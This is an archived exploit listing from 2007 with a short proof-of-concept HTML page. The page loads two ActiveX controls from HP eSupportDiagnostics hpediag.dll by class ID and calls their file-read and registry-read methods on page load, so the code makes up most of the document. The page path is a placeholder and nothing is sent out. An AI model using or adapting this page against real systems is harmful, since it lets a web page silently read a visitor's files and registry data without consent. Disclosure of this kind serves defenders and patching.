hpreg-read.txt

hpreg-read.txt: Posted Dec 20, 2007; Authored by Elazar Broad; Proof of concept code that demonstrates an arbitrary file read vulnerability in the HP eSupportDiagnostics hpediag.dll.; tags | exploit, arbitrary, proof of concept; SHA-256 | 97ba2d1f5c9148602e7993de7feedecb0cf944053816de0f478474f28c3dc13d; Download | Favorite | View

hpreg-read.txt

The HP eSupportDiagnostics hpediag.dll exposes some methods that allow the reading of arbitrary files and registry values.

hpediag.dll, version 1.0.11.0

PoC as follows:

---------------------

<html>
 <head>
  <script language="JavaScript" DEFER>
   function Check() {
    var out = fileUtil.ReadTextFile(somePath);
    var out = regUtil.ReadValue(somePath);
 
   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">
  <object id="fileUtil" classid="clsid:CDAF9CEC-F3EC-4B22-ABA3-9726713560F8" />
  <object id="regUtil"  classid="clsid:0C378864-D5C4-4D9C-854C-432E3BEC9CCB" />
</body>
</html> 

---------------------


Elazar

Top Authors In Last 30 Days

Red Hat 114 files
Ubuntu 98 files
Debian 14 files
Rafael Pedrero 11 files
Apple 9 files
Google Security Research 9 files
Abdulhakim Oner 8 files
nu11secur1ty 8 files
Hubert Wojciechowski 6 files
Sarang Tumne 5 files

File Archives

Systems

AIX (426)
Apple (1,960)
BSD (372)
CentOS (56)
Cisco (1,919)
Debian (6,715)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,288)
HPUX (878)
iOS (340)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,153)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,930)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,462)
UNIX (9,208)
UnixWare (185)
Windows (6,533)
Other

hpreg-read.txt

hpreg-read.txt

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

hpreg-read.txt

Share This

hpreg-read.txt

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems